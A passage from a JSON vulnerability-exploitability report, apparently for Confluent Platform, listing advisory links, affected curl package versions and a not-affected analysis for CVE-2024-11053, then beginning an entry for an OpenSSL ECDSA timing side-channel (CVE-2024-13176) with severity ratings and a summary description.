          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339281"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339284"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339291"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339293"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339295"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339299"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339300"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339304"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339305"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://curl.se/docs/CVE-2024-11053.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2024-11053.json"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-11053"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21193"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21194"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21196"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21197"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21198"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21199"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21201"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21203"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21212"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21213"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21218"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21219"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21230"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21231"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21236"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21237"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21238"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21239"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21241"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21247"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-37371"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5535"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-7264"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21490"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21491"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21494"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21497"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21500"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21501"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21503"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21504"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21505"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21518"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21519"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21520"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21521"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21522"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21523"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21525"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21529"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21531"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21534"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21536"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21540"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21543"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21546"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21555"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21559"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2025-1671.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2025:1671"
        },
        {
          "url": "https://github.com/advisories/GHSA-h288-5fq8-5pfw"
        },
        {
          "url": "https://hackerone.com/reports/2829063"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2024-11053.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2025-1673.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-11053"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250124-0012"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250124-0012/"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250131-0003"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250131-0003/"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250131-0004"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250131-0004/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7162-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8525-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-11053"
        },
        {
          "url": "https://www.oracle.com/security-alerts/cpujan2025.html#AppendixMSQL"
        }
      ],
      "published": "2024-12-11T08:15:05+00:00",
      "updated": "2026-06-17T06:56:57+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2024-13176",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 4.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:P/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        385
      ],
      "description": "Issue summary: A timing side-channel which could potentially allow recovering\nthe private key exists in the ECDSA signature computation.\n\nImpact summary: A timing side-channel in ECDSA signature computations\ncould allow recovering the private key by an attacker. However, measuring\nthe timing would require either local access to the signing application or\na very fast network connection with low latency.\n\nThere is a timing signal of around 300 nanoseconds when the top word of\nthe inverted ECDSA nonce value is zero. This can happen with significant\nprobability only for some of the supported elliptic curves. In particular\nthe NIST P-521 curve is affected. To be able to measure this leak, the attacker\nprocess must either be located in the same physical computer or must\nhave a very fast network connection with low latency. For that reason\nthe severity of this vulnerability is Low.\n\nThe FIPS modules in 3.4, 3.3, 3.2, 3.1 and 3.0 are affected by this issue.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2024-13176"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2025/01/20/2"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2025:15699"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2024-13176"
        },
        {
          "url": "https://bugzilla.redhat.com/2359885"
        },
        {
          "url": "https://bugzilla.redhat.com/2359888"
        },
        {
          "url": "https://bugzilla.redhat.com/2359892"
        },
        {
          "url": "https://bugzilla.redhat.com/2359894"
        },
        {
          "url": "https://bugzilla.redhat.com/2359895"
        },
        {
          "url": "https://bugzilla.redhat.com/2359899"
        },
        {
          "url": "https://bugzilla.redhat.com/2359900"
        },
        {
          "url": "https://bugzilla.redhat.com/2359902"
        },
        {
          "url": "https://bugzilla.redhat.com/2359903"
        },
        {
          "url": "https://bugzilla.redhat.com/2359911"
        },
        {
          "url": "https://bugzilla.redhat.com/2359918"
        },
        {
          "url": "https://bugzilla.redhat.com/2359920"
        },
        {
          "url": "https://bugzilla.redhat.com/2359924"
        },
        {
          "url": "https://bugzilla.redhat.com/2359928"
        },
        {
          "url": "https://bugzilla.redhat.com/2359930"
        },
        {
          "url": "https://bugzilla.redhat.com/2359932"
        },
        {
          "url": "https://bugzilla.redhat.com/2359934"
        },
        {
          "url": "https://bugzilla.redhat.com/2359938"
        },
        {
          "url": "https://bugzilla.redhat.com/2359940"
        },
        {
          "url": "https://bugzilla.redhat.com/2359943"
        },
        {
          "url": "https://bugzilla.redhat.com/2359944"
        },
        {
          "url": "https://bugzilla.redhat.com/2359945"
        },
        {
          "url": "https://bugzilla.redhat.com/2359947"
        },
        {
          "url": "https://bugzilla.redhat.com/2359950"
        },
        {
          "url": "https://bugzilla.redhat.com/2359963"
        },
        {
          "url": "https://bugzilla.redhat.com/2359964"
        },
        {
          "url": "https://bugzilla.redhat.com/2359972"
        },
        {
          "url": "https://bugzilla.redhat.com/2370920"
        },
        {
          "url": "https://bugzilla.redhat.com/2380264"
        },
        {
          "url": "https://bugzilla.redhat.com/2380273"
        },
        {
          "url": "https://bugzilla.redhat.com/2380274"
        },
        {
          "url": "https://bugzilla.redhat.com/2380278"
        },
        {
          "url": "https://bugzilla.redhat.com/2380280"
        },
        {
          "url": "https://bugzilla.redhat.com/2380283"
        },
        {
          "url": "https://bugzilla.redhat.com/2380284"
        },
        {
          "url": "https://bugzilla.redhat.com/2380290"
        },
        {
          "url": "https://bugzilla.redhat.com/2380291"
        },
        {
          "url": "https://bugzilla.redhat.com/2380295"
        },
        {
          "url": "https://bugzilla.redhat.com/2380298"
        },
        {
          "url": "https://bugzilla.redhat.com/2380306"
        },
        {
          "url": "https://bugzilla.redhat.com/2380308"
        },
        {
          "url": "https://bugzilla.redhat.com/2380309"
        },
        {
          "url": "https://bugzilla.redhat.com/2380310"
        },
        {
          "url": "https://bugzilla.redhat.com/2380312"
        },
        {
          "url": "https://bugzilla.redhat.com/2380313"
        },
        {
          "url": "https://bugzilla.redhat.com/2380320"
        },
        {
          "url": "https://bugzilla.redhat.com/2380321"
        },
        {
          "url": "https://bugzilla.redhat.com/2380322"
        },
        {
          "url": "https://bugzilla.redhat.com/2380326"
        },
        {
          "url": "https://bugzilla.redhat.com/2380327"
        },
        {
          "url": "https://bugzilla.redhat.com/2380334"
        },
        {
          "url": "https://bugzilla.redhat.com/2380335"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2338999"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359885"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359888"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359892"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359894"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359895"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359899"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359900"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359902"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359903"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359911"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359918"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359920"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359924"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359928"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359930"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359932"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359934"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359938"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359940"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359943"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359944"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359945"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359947"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359950"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359963"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359964"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359972"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2370920"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380264"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380273"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380274"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380278"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380280"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380283"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380284"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380290"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380291"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380295"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380298"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380306"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380308"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380309"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380310"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380312"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380313"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380320"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380321"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380322"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380326"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380327"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380334"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380335"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-13176"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21574"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21575"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21577"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21579"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21580"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21581"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21584"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21585"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21588"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30681"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30682"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30683"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30684"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30685"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30687"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30688"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30689"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30693"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30695"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30696"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30699"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30703"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30704"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30705"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30715"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30721"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30722"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50077"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50078"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50079"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50080"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50081"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50082"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50083"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50084"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50085"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50086"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50087"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50088"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50091"
        },
        {
